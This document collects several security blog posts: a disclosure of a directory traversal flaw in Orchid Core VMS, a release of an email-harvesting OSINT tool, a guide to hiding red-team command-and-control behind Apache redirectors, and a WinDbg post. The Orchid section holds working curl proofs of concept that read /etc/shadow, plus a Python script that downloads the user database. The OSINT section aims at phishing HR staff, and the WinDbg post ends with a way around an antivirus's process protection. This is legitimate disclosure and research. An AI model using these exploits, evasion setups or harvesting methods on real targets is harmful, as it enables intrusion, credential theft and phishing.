CVE-2018-10956: Unauthenticated Privileged Directory Traversal in IPConfigure Orchid Core VMS

Affected Software: IPConfigure Orchid Core VMS (All versions < 2.0.6, tested on Linux and Windows)

Vulnerability: Unauthenticated Privileged Directory Traversal

CVE: CVE-2018-10956

Impact: Arbitrary File Read Access

Metasploit module:

https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb

Summary of Vulnerability

IPConfigure Orchid Core VMS is a Video Management System that is vulnerable to a directory traversal attack, which allows access to the underlying database, camera feeds and more. A remote, unauthenticated attacker can send crafted GET requests to the application and read arbitrary files outside of the application's web directory. The issue is further compounded because the Linux version of Orchid Core VMS runs in the context of a user in the "sudoers" group. As such, any file on the underlying system whose location is known can be read.

Nettitude has performed limited testing on the Windows version of Orchid Core VMS and has been able to read files such as ‘C:/Windows/debug/NetSetup.log’ and ‘C:/WINDOWS/System32/drivers/etc/hosts’. Reading these files does not require permissions greater than those of a regular user account; however, it is possible that the Orchid Core VMS web server is running in a privileged context.

Below is an image of the Orchid Core VMS login page.

Metasploit Module

We have created a Metasploit module for this vulnerability; it is available at https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb.

Vulnerability Analysis and Impact

Discovery of the vulnerability involved multiple steps, such as identifying the URL encoding accepted by the application and identifying the location of files on the underlying system, the latter of which was done through manual and automated fuzzing techniques.

The following images will help explain the discovery and exploitation of this vulnerability. This is the first GET request that was sent through a browser.

Request: https://ip/../../../../../../../etc/shadow

The response is interesting, as the error suggests that it may be possible to read resources on the underlying web server. In this request it appears that the dot-dot-slash (../) sequence was removed by the application. As such, in the second request the dot-dot-slash was URL encoded and once again submitted through the browser.

Request: https://ip/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/shadow

In this request, the URL-encoded forward slash (%2f) was removed. For the third request, the browser was therefore bypassed and the same request was sent directly to the web server using curl.

The following image demonstrates the ability to read the ‘/etc/shadow’ file on a Linux file system. This is of particular concern as it shows that the Orchid web service is running with high privileges. With this level of access, an attacker is in a position to read files of particular interest, such as SSH private keys and VPN configuration files, as well as any other file on the underlying system.

The following image demonstrates the ability to read the ‘C:\Windows\debug\NetSetup.log’ file on a Windows file system, showing that the vulnerability is not limited to Linux and affects both Windows and Linux deployments.

Furthermore, Nettitude was able to identify the application's structure and database location using readily available developer documentation and the online knowledge base for Orchid Core VMS (https://support.ipconfigure.com/hc/en-us/categories/200146489-Orchid-Core-VMS).

Orchid Core VMS uses a SQLite database, which is stored as a single file on disk. Nettitude was able to download this database using the previously described directory traversal vulnerability. The image below shows the users who have access to the application, along with their salted SHA1 password hashes (16-byte salt). Upon cracking these hashes and obtaining the cleartext password for a user account, an attacker is in a position to view live camera streams, manage user accounts and perform other application functions which are otherwise restricted to authenticated users.
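To illustrate the attack chain end to end, the sketch below fetches a file through the encoded traversal using Python's requests library and then inspects the downloaded SQLite database. The database path shown is a placeholder; the real location has to be identified per installation and is not reproduced here.

import sqlite3
import requests

# Encoded dot-dot-slash sequence, as used in the proof of concept requests
TRAVERSAL = "%2e%2e%2f" * 6

# Placeholder values - the target host and database location must be set per engagement
BASE_URL = "https://192.168.1.10"
DB_PATH = "path/to/orchid.sqlite"

# verify=False mirrors curl's --insecure flag for self-signed certificates
resp = requests.get(BASE_URL + "/" + TRAVERSAL + DB_PATH, verify=False)
resp.raise_for_status()

with open("orchid.sqlite", "wb") as f:
    f.write(resp.content)

# List the tables in the downloaded database
conn = sqlite3.connect("orchid.sqlite")
for (name,) in conn.execute("SELECT name FROM sqlite_master WHERE type='table'"):
    print(name)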

Perusing the database, Nettitude also discovered valid session IDs for the web application and descriptions of the connected cameras.

Proof of Concept for Linux

curl --insecure https://IP/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/shadow

Proof of Concept for Windows

curl http://IP:PORT/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/Windows/debug/NetSetup.log

Disclosure Timeline

  • 20 April 2018: Discovered directory traversal vulnerability in Orchid VMS 2.0 on Ubuntu 14.04 LTS.
  • 7 May 2018: Confirmed the vulnerability on other Linux distributions and on Windows, across all Orchid VMS versions.
  • 7 May 2018: Initial write up of vulnerability.
  • 7 May 2018: Initial reach out to IPConfigure. Submitted request for contact details for an information security employee.
  • 8 May 2018: Verified that the correct contact has been reached.
  • 9 May 2018: Requested CVE reservation from Mitre.
  • 9 May 2018: Received CVE-2018-10956 from Mitre.
  • 9 May 2018: Sent PGP encrypted vulnerability write up to contact at IPConfigure.
  • 11 May 2018: Received confirmation of vulnerability from IPConfigure.
  • 11 May 2018: IPConfigure releases v2.0.6 for public download, resolving the identified vulnerability.
  • 20 June 2018: Nettitude publicly disclosed the vulnerability.

Introducing Prowl

Prowl was initially designed as an in-house tool to aid engagements where there is a requirement to capture email addresses from LinkedIn. Recently, it has been further developed to provide the same initial functionality, plus features such as matching emails against data breaches, identifying current job openings at the target organisation (handy for targeting recruiters and HR when social engineering), subdomain identification and much more. It does so without breaching LinkedIn's Terms of Service. We are formally releasing Prowl to the public today.

Installation

The first step of the installation is to clone the GitHub repository that contains all of the code required by Prowl.

git clone https://github.com/nettitude/prowl

Once you've downloaded the script, it's time to update and install all of the required dependencies. This can be done by copying and pasting the commands below into your terminal.
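As a minimal sketch, assuming the repository ships a requirements.txt file, this typically amounts to:

cd prowl
pip install -r requirements.txt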

Using Prowl

A core objective of Prowl is to keep the tool both simple and independent; it doesn't require any API keys or cookies in order to run. The minimum information required is the company name and the format of the organisation's email addresses. It should be noted that all optional flags, excluding the proxy, can be selected via -a.


As mentioned, the company name needs to be supplied to Prowl. This can be done by adding the -c flag followed by the organisation's name; if the name contains spaces, it needs to be wrapped in quotation marks, for example "Acme Inc". In addition, the email format must be supplied via the -e flag, followed by the mark-up and domain.

Examples

  • matthewpickford@nettitude.com  ->  -e "<fn><ln>@nettitude.com"
  • mpickford@nettitude.com  ->  -e "<fi><ln>@nettitude.com"
  • matthewp@nettitude.com  ->  -e "<fn><li>@nettitude.com"
  • mp@nettitude.com  ->  -e "<fi><li>@nettitude.com"

Other characters such as hyphens can be added between the mark-up, for example:

  • matthew-pickford@nettitude.com  ->  -e "<fn>-<ln>@nettitude.com"
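Putting the flags described above together, a typical invocation might look like the following; the prowl.py entry point name is an assumption, and the -j flag is optional:

python prowl.py -c "Acme Inc" -e "<fn><ln>@acme.com" -j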

Password Identification

An early feature was the identification of email addresses found in publicly known password dumps. This is still possible via the ‘HaveIBeenPwned’ API; however, in the latest version of Prowl, instead of displaying this information via STDOUT, the results are stored in the output accounts file by default.

Finding Jobs

It's a pretty well-known fact that recruiters and HR departments are usually a weak link when it comes to clicking links and opening documents. It is, after all, their job to review CVs, so they're not entirely to blame. To build rapport with these heavy clickers it can be useful to know the jobs currently available within the organisation. Prowl can do this by scraping Indeed job listings without needing any extra information; all that is required is to include the -j flag in the arguments.


Subdomain Identification

Prowl isn't only useful for social engineering; it can also help with password guessing attacks against services such as OWA. The email addresses gathered are only as useful as the services available to attack, so to help find the organisation's IP addresses Prowl identifies the registered SSL/TLS certificates for the domain. As seen in the image below, if a hostname doesn't have an associated IP address the result is highlighted in red, while hostnames that do resolve are highlighted in orange.


Proxy

A requested feature was the ability to pass the Yahoo searches through a proxy, and this has been implemented in the latest version of Prowl. Using the -p flag followed by the proxy address will forward all Yahoo and Bing requests via the supplied server. If the proxy fails to pass a request, Prowl will not fall back to making requests directly; it will exit instead. An example:

-p https://127.0.0.1:8080

Output

It's always been a frustration of mine when you run a tool and forget to supply the output flag. Prowl automatically saves all collected data into a company folder within the output directory; each data source is saved as a CSV file.


Comparison

As with any ongoing project, it's always good to compare it against other tools to see how it performs. The latest iteration of Prowl gets the most results with Nettitude as the search criteria. This may vary from organisation to organisation, but from our testing it appears to be a consistent trend.

Tool       Results
Prowl      53
InSpy      35
Harvester  9

Future

From now on, Prowl will receive regular updates, predominantly to adapt to changes in the sources it scrapes. A potential idea on the horizon is the ability to push the results from Prowl into a database, whether locally or on an internal network. A dream for Prowl would be a way of identifying the email format without the need to provide it as a script argument.

If you have any ideas or feature requests, feel free to make a request via GitHub or drop an email to mpickford at nettitude [.] com.

Apache mod_python for red teams

Nettitude’s red team engagements are typically designed to be as highly targeted and as stealthy as possible. For the command and control (C2) infrastructure, this means layering several techniques.

  • We hide all of our C2 infrastructure behind a number of Apache web servers
  • Any traffic to the C2 is checked against an IP whitelist
  • IP addresses that do not match the whitelist are directed to a legitimate site
  • IP addresses matching the whitelist are filtered further; any traffic that does not match our C2 traffic profile is also directed to the legitimate site
  • Any remaining traffic is directed to the C2 infrastructure

We have previously used Apache rewrite rules (mod_rewrite) to accomplish all of this, and it works very well. However, if you need to do anything more advanced than regular expression matching, rewrite rules quickly become limiting.

I've recently been looking into adding malleable comms to our private, in-house red team implant; that is, comms which can be changed to look like something else, such as Zeus bot traffic, in a similar way to Cobalt Strike. While doing this I was playing around with mod_python, and it occurred to me that we could replace our mod_rewrite rules with mod_python in order to make them more manageable. This post gives an overview of how that can be achieved.

Some knowledge of Apache and Python is assumed here; you must be able to set up a basic virtual host and understand how to write Python scripts.

Enable Apache Python module

The Python module needs to be enabled on the server. On an Ubuntu installation, two commands executed as root will achieve this.
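Assuming the libapache2-mod-python package is available for your Ubuntu release, installing and enabling the module typically looks like this:

apt-get install libapache2-mod-python
a2enmod python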

Example virtual host setup

For this example there are three virtual hosts: one internet facing, which will run the Python code and redirect users to the correct location; a legitimate site; and a C2 site. Adapt this example to match your own C2 setup.

Legitimate site

A legitimate looking site that non-whitelisted users will be directed to, running on port 8000.
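A minimal sketch of what this virtual host could look like; the ServerName and DocumentRoot are illustrative, not taken from the original configuration:

Listen 8000
<VirtualHost 127.0.0.1:8000>
    # Backend only needs to be reachable from the redirector host
    ServerName legit.example.com
    DocumentRoot /var/www/legit
</VirtualHost>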

A test index.html page can be added to the legitimate site's directory.

Command and control

For illustration purposes only, here’s a command and control site, running on port 9000. In real life, you would redirect traffic to your real C2 infrastructure.
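Similarly, a sketch of the stand-in C2 virtual host; again, names and paths are illustrative:

Listen 9000
<VirtualHost 127.0.0.1:9000>
    # Stand-in for the real C2 infrastructure
    ServerName c2.example.com
    DocumentRoot /var/www/c2
</VirtualHost>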

A test index.html page containing some placeholder content can be added, so that responses from this host are easy to distinguish from the legitimate site.

Internet facing virtual host

Finally, there is the internet facing host, which is bound to port 80. In real life you would also want to run this on port 443, with a valid SSL certificate appropriate to the engagement.
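A sketch of the internet-facing virtual host, using the mod_python directives described below; the handler module name and paths are assumptions:

<VirtualHost *:80>
    ServerName redirector.example.com
    DocumentRoot /var/www/redirector

    # Make the handler module importable and hook every incoming request
    PythonPath "sys.path + ['/var/www/redirector']"
    PythonPostReadRequestHandler handler
    PythonDebug On
</VirtualHost>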

In order to be able to redirect users, we have hooked the PostReadRequestHandler using the PythonPostReadRequestHandler directive. All requests will be directed through this script and can then be redirected appropriately.

Python debug is also turned on using the PythonDebug directive, to allow us to easily see any errors in our scripts.

The handler script

For the handler, it is possible to write a Python class. The first class defined in the file will be instantiated. A class is overkill for this example, so instead a single function will suffice, which should be called postreadrequesthandler.

In this example, we will redirect curl clients to the C2 server and anyone else to the legitimate site. Log entries will be placed into the Apache error.log file.

The documentation for mod_python is quite sparse, so in order to work out how to perform a redirect correctly I had to refer to both the mod_proxy and mod_rewrite source code. After some experimentation I found the correct method.
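A minimal sketch of such a handler, assuming mod_proxy is enabled and the backend ports used earlier. The redirect mechanism shown (setting proxyreq, filename and handler on the request) mirrors what mod_rewrite's proxy flag does internally; it is not necessarily the exact code from the original post.

from mod_python import apache

# Backend locations - illustrative, match these to your own setup
C2_BACKEND = "http://127.0.0.1:9000"
LEGIT_BACKEND = "http://127.0.0.1:8000"

def postreadrequesthandler(req):
    user_agent = req.headers_in.get('User-Agent', '')

    if 'curl' in user_agent:
        backend = C2_BACKEND
        req.log_error('redirector: %s -> C2' % req.connection.remote_ip)
    else:
        backend = LEGIT_BACKEND
        req.log_error('redirector: %s -> legitimate site' % req.connection.remote_ip)

    # Hand the request to mod_proxy as an internal reverse-proxy request
    req.proxyreq = apache.PROXYREQ_REVERSE
    req.filename = 'proxy:' + backend + req.uri
    req.handler = 'proxy-server'

    return apache.OK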

Once all of this is in place and the apache2 service has been restarted, a request from curl should be served the C2 test page:

$ curl localhost:80

Changing the curl user agent will send you to the legitimate site:

$ curl localhost:80 --user-agent "hello"

Log Output

The Apache error log should show some useful output, thanks to mod_python.

Further Reading

Full documentation is available for mod_python here:

http://modpython.org/live/current/doc-html/contents.html

WinDbg: using pykd to dump private symbols

We've recently been conducting some reverse engineering and vulnerability analysis on an Anti-Virus (AV) product and wanted to attach Rohitab API Monitor to one of the AV's running processes in order to log the Windows API function calls and better understand how the AV was implemented.

The AV in question was protecting its user mode process by making use of kernel callbacks in one of its device drivers. The callbacks were registered using the ObRegisterCallbacks function.
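For reference, the documented prototype (from the WDK headers) is:

NTSTATUS ObRegisterCallbacks(
    POB_CALLBACK_REGISTRATION CallbackRegistration,
    PVOID                     *RegistrationHandle
);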

This is the post-PatchGuard method of allowing an AV driver to intercept calls to ZwOpenProcess, amongst others, so that access to the process handle can be denied, or the returned handle can be given reduced access rights.

The OB_CALLBACK_REGISTRATION and OB_OPERATION_REGISTRATION structures are not defined in the Microsoft public symbols, so the WinDbg command x nt!_OB* doesn't help. Both structures are well documented on MSDN, so after intercepting the call to ObRegisterCallbacks in WinDbg I started decoding the structures by calculating offsets and dumping memory addresses.

After a couple of debugging runs, this soon becomes tedious; my heart sank when I thought I might have to write a WinDbg script to automate the process. If you’re like me and you don’t use WinDbg scripts that often then you will know how time consuming it can be to re-learn WinDbg scripting each time you need it.

Then I remembered pykd, a Python scripting module for WinDbg, which I had heard about but never tried.

Pykd installation

If you are using the x64 version of WinDbg then you also need to install a 64-bit version of Python. I chose the 2.7.x branch as I already have some build scripts written for Python 2.7.x; at the time of writing, the latest version was 2.7.14.

Once installed, head over to the pykd repository; the home of pykd has recently moved to githomelab.ru.

Download the bootstrapper zip, which contains pykd.dll.

pykd.dll has to be copied into the WinDbg “winext” folder, which for me was in the following location:

  • C:\Program Files\Windows Kits\10\Debuggers\x64\winext

The pykd module needs to be added to your Python installation; I used pip from a command prompt to achieve this.
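The pykd module is published on PyPI, so this is typically just:

pip install pykd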

Pykd can then be loaded into WinDbg using the command .load pykd.

Note that the pykd documentation is in Russian; however, Google Translate did an excellent job of translating it to English. The documentation is linked from the pykd repository.

Dumping OB_CALLBACK_REGISTRATION using pykd

Pykd allows type information to be dynamically created using the typeInfo class. It is also possible to retrieve existing type information (similar to the dt WinDbg command). Using these two capabilities, the _OB_CALLBACK_REGISTRATION structure can be defined.
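A sketch of this step, assuming pykd 0.3's custom-type helpers createStruct and baseTypes; the field layout comes from the MSDN definitions, with explicit padding fields added for x64 alignment:

from pykd import *

# OB_CALLBACK_REGISTRATION, as documented on MSDN (x64 layout)
obCallbackReg = createStruct("_OB_CALLBACK_REGISTRATION")
obCallbackReg.append("Version", baseTypes.UInt2B)
obCallbackReg.append("OperationRegistrationCount", baseTypes.UInt2B)
obCallbackReg.append("Padding", baseTypes.UInt4B)                # alignment before the UNICODE_STRING
obCallbackReg.append("Altitude", typeInfo("nt!_UNICODE_STRING"))
obCallbackReg.append("RegistrationContext", baseTypes.UInt8B)    # PVOID
obCallbackReg.append("OperationRegistration", baseTypes.UInt8B)  # POB_OPERATION_REGISTRATION

# OB_OPERATION_REGISTRATION - the entries pointed to by OperationRegistration
obOperationReg = createStruct("_OB_OPERATION_REGISTRATION")
obOperationReg.append("ObjectType", baseTypes.UInt8B)            # POBJECT_TYPE *
obOperationReg.append("Operations", baseTypes.UInt4B)
obOperationReg.append("Padding", baseTypes.UInt4B)
obOperationReg.append("PreOperation", baseTypes.UInt8B)
obOperationReg.append("PostOperation", baseTypes.UInt8B)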

Using the typeInfo function we can obtain the type information for UNICODE_STRING, which is a public symbol.
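For example, in a pykd script:

# UNICODE_STRING is in the public symbols, so its type information can be fetched directly
usType = typeInfo("nt!_UNICODE_STRING")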

We can create an instance of a type using the typedVar function, which takes a typeInfo and an address as parameters. In pykd an address is simply an integer.

Once we have a typedVar instance, we can dump the information in a similar way to using dt nt!_OB_CALLBACK_REGISTRATION <address> (if the symbol were public) by casting it to a string. Dumping the data in this way doesn't recurse into nested structures, so the output can be improved by iterating over the OperationRegistration array and dumping each item individually.
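A sketch of that, assuming the custom types defined above and an address variable holding the location of the registration structure (populated from the command line in the next step):

# Overlay the custom type on the target address and dump it
callbackReg = typedVar(obCallbackReg, address)
dprintln(str(callbackReg))

# str() does not recurse, so walk the OperationRegistration array entry by entry
entrySize = obOperationReg.size()
for i in range(callbackReg.OperationRegistrationCount):
    entry = typedVar(obOperationReg, callbackReg.OperationRegistration + i * entrySize)
    dprintln(str(entry))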

The final step is to parse the script command line. I wanted to be able to use a register as a parameter as well as an address, so I did some ghetto input parsing.
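Something along these lines works, assuming the first script argument is either a register name or an address expression:

import sys
from pykd import reg, expr

# Accept either a register name (e.g. rcx) or a literal address
arg = sys.argv[1]
try:
    address = reg(arg)       # try it as a register name first
except Exception:
    address = expr(arg)      # otherwise evaluate it as an expression/address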

The script can be run in WinDbg as follows, using the rcx register as input.
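For example (the script name and path here are hypothetical):

!py c:\scripts\dump_ob_callbacks.py rcx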

Output

Executing the script while on a breakpoint at nt!ObRegisterCallbacks gives the following output.

Ideas for enhancing the script

Breakpoint Links

It is possible to output Debugger Markup Language (DML) from pykd. It would be quite simple to emit links from the script that allow breakpoints to be set. DML is documented in the Windows debugging tools documentation.

The dprintln function takes an additional parameter that specifies whether DML should be emitted.
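For example, the following emits a clickable link that sets a breakpoint when selected (the breakpoint target is just an illustration):

dprintln('<link cmd="bp nt!ObRegisterCallbacks">Break on ObRegisterCallbacks</link>', True)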

Specifying True for the second parameter will output DML.

Patching a ret into the callback functions

Using pykd it is also possible to manipulate memory, so the callback functions could be automatically patched to return immediately; in fact, this is what I did to bypass the process protection implemented by the AV.
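A sketch of that idea, reusing the entry variable from the earlier loop and patching via the debugger's edit-byte command (the decision to patch PreOperation is illustrative):

# Overwrite the first instruction of the pre-operation callback with 'ret' (0xC3)
dbgCommand("eb 0x%x c3" % entry.PreOperation)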

Other WinDbg scripting options

If you don't want to use Python/pykd then other options are available. Here are two of the most recent ones.

WinDbg Preview (JavaScript)

The WinDbg Preview version is available from the Microsoft Store.

It has an updated, modern UI and allows JavaScript to be used for scripting.

LINQ Debugger Objects

WinDbg can also be queried with LINQ debugger objects; if you are familiar with LINQ then this might be a good option.